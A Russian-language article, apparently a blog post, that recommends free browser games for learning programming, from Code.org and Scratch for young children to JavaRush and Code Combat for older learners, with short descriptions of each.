Препятствием для использования подобных ресурсов может быть неосведомлённость о их существовании или незнание языка. Действительно, англоязычных ресурсов и игр значительно больше. Но существуют и русскоязычные игры, обучающие программированию. 

Здесь собраны бесплатные русскоязычные браузерные игры, которые научат составлять алгоритмы и даже писать код. Они размещены в порядке усложнения. Последние из игр в этом списке предназначены для взрослых людей. Вряд ли можно стать программистом только играя. Но можно получить положительный заряд на старте, изучить основные алгоритмические конструкции и логику программирования, приобрести навыки планирования действий при решении практических задач.

Учитесь программировать. Учитесь думать


Code.org




Ресурс создан для детей от 4-х до 10-и лет, но, как утверждают его создатели, подойдет пользователям всех возрастов. Обучение начинается с самых азов — с обучения использованию мышки. Используется scratch-подобный язык состоящий из блоков. Играя ребёнок разберётся с азами программирования, узнает как алгоритм превращается в JavaScript-код и создаст свою собственную компьютерную игру. 

Minecraft




Minecraft — совместный проект Microsoft и Code.org. Игра рассчитана на детей от 6 лет и предполагает решение различных задач при помощи построения алгоритмов. Это позволяет детям освоить основы программирования, понять как работают его базовые механизмы. 

Minecraft действительно образовательная игра: она развивает пространственное мышление, математические и логические способности. И ещё игра учит чтению и письму, повышает общую грамотность. Впрочем, не только Minecraft имеет такой эффект, а любая деятельность, которой дети увлечены и которая мотивирует их к приобретению новых полезных навыков.

Скретч


 

Скретч — специальный визуальный язык программирования, который был разработан в MIT для обучения детей. Изучение Скретч проходит в игровой форме. Скретч развивает логическое и критическое мышление, воображение, дети учатся решать разноплановые задачи, у них появляются новые возможности для самовыражения и творчества. Разумеется, необязательно, что ваш ребенок в будущем станет программистом. Однако, обучение детей элементарным основам программирования поможет им развиваться быстрее и веселее.

Blockly




Blockly, как и Скретч, создаёт программу при помощи соединения блоков. Но если Скретч больше подходит для внеклассных занятий, Blockly можно использовать в школе. Эта игра позволяет создавать учебные задания, компоновать их в модули, проходя которые, ученик постепенно осваивает какую-то тему.
Вот, например, как выглядит созданная в Blockly головоломка по странам и флагам:



ПиктоМир




ПиктоМир, разработанный НИИСИ РАН по заказу Российской академии наук, — наш ответ зарубежным аналогам. В НИИСИ РАН уже разработали систему «КуМир», в которой с программированием знакомятся старшие школьники, но игрового элемента в ней нет. 

Сюжет игры: на картинке изображен космодром, с которого стартуют космические корабли, и при старте они выжигают покрытие. А поскольку там всё горячее и радиоактивное, то людей посылать восстанавливать покрытие нельзя, и туда посылают робота-вертуна (подозрительно похожего на R2D2). Этому роботу нужно задать программу, чтобы он сам не разбился о бордюрчик (робот в этом случае краснеет) и всё выгоревшее залил защитным составом.

Робот раскрашивает поля, а ребёнок учится составлять алгоритмы. Все подсказки выполнены с помощью графики, поэтому ПиктоМир можно предлагать детям, не умеющим читать, учёные постарались сделать действия понятными даже для малышей. 

Первые четыре уровня игры доступны всем, пятый уровень — головоломки для одарённых детей, шестой уровень — головоломки для родителей, чтобы им тоже было интересно.

/habracdn.net/habr/images/1450174332/bg-user2.gif"" target="_blank">https://habracdn.net/habr/images/1450174332/bg-user2.gif") 0% 50% no-repeat;">zesetup напоминает про игру Colobot.

Colobot




Колобот — 3d стратегия, разработаная компанией Epsitec в 2001. Игра призвана обучить детей (от 10 лет и старше) навыкам программирования в игровой форме. Геймплей заключается в создании программ для роботов. Цель — подготовить планеты для заселения и добычи полезных ископаемых.

Особенностью игры является возможность создавать программы, в соответствии с которыми в игре действуют роботы (задавая им алгоритмы самостоятельной работы и заменяя ими монотонные действия, которые может делать и сам игрок), поэтому считается, что игра способствует обучению программированию. Язык программирования, встроенный в игру, похож на C++ или Java, но имеется ограничение на размер программы — не более 20 000 символов, что не позволяет писать серьёзные программы вроде имитации искусственного интеллекта. К каждой миссии прилагается обширная справка с объяснением что необходимо сделать. Также зачастую там есть шпаргалка — готовая программа (или куски программы) с помощью которой можно решить поставленную задачу.

Существует русская локализация игры.



Microsoft Imagine




Microsoft Imagine предлагает средства для обучения и разработки, начиная с самой первой игры или приложения до облачных исследовательских проектов с использованием больших данных. Приложения распределены по уровням сложности. Самые простые из них доступны детям 9-10 лет, более сложные предназначены для старшеклассников и студентов. Использование только некоторых приложений доступно в браузере, для запуска остальных требуется установка бесплатного ПО и операционная система Windows. Ежегодно проводится конкурс Imagine Cup, в котором могут принять участие школьники, студенты и аспиранты из разных стран мира. Главным заданием участников является разработка идеи проекта или игры и создание её прототипа с помощью современных информационных технологий.

JavaRush




JavaRush — изучение программирования на Java в виде онлайн-игры. Каждому уровню соответствует отдельная солнечная система на звездной карте. Лекциям внутри уровня — планеты солнечной системы. Каждая открытая лекция – это перелёт на очередную планету. Когда все лекции открыты, корабль перелетает к следующей звездной системе.
Весь курс Java Core на JavaRush состоит из сорока уровней. Первые 10 уровней доступны всем, уровни 11 и выше доступны при наличии платной подписки.

На каждом уровне JavaRush 10-15 мини-лекций, так что 10 бесплатных уровней — это около 140 лекций и где-то 230 задач. Достаточно, чтобы вы определились, подходит вам JavaRush или нет.

Code Combat




Разработчики Code Combat предлагают учиться программированию, захватывая земли и побеждая врагов в лучших традициях RPG. 

Начинать играть можно «с нуля», не имея о программировании никакого представления. Пользователь может выбрать язык программирования, который хочет освоить: Python или JavaScript. Уровни игры выстроены как хороший курс программирования с нарастающей сложностью.

Вам предстоит стать волшебником, который c помощью программного кода меняет окружающий мир. На каждом уровне перед игроком ставится определенная задача — например, найти гриб, который поможет победить людоеда, повести в бой солдат или выбраться из темницы. В начале всё просто, вы пишете код и сразу видите на экране, как он будет выполняться. Потом задачи становятся более сложными, и вам приходится думать всё больше и больше. 

Игра имеет 80 бесплатных уровней и открытый программный код. Сотни игроков из разных стран приложили свой талант к тому, чтобы CodeCombat стал лучше. Именно благодаря этому мир воинов и магов оказался быстро переведён на разные языки, в том числе на русский. 
Нужно научиться программировать? Вам не нужны уроки. Вам нужно написать много кода и хорошо провести время, занимаясь этим. Это сущность программирования. Это должно быть весело. Не в том смысле, когда «уау, бейдж», а в том, когда «нет, мама, я должен закончить уровень». Вот почему Code Combat — это многопользовательская игра, а не курсы. Мы не остановимся, пока вы не сможете остановиться — но на этот раз это действительно хорошо. (из описания на сайте проекта)

UPD После 18 уровней в игре появляются две ветки — одна платная, вторая бесплатная. В игре 80 бесплатных уровней. По платной подписке доступны 60 дополнительных уровней.

Ещё статьи по теме:
12 игр, которые обучают детей программированию
Мой опыт обучения детей 8-10 лет программированию на Scratch
Приключенческая игра, в которую играют путем изменения её Javascript-кода
FightCode: танковые войны на JavaScript
Обучение программированию через игру или как быстро собрать весь мёд
Colobot и Ceebot


Поиск сообщений в it_is_it
Страницы: 17 16 15 [14] 13 12 ..
.. 1 Календарь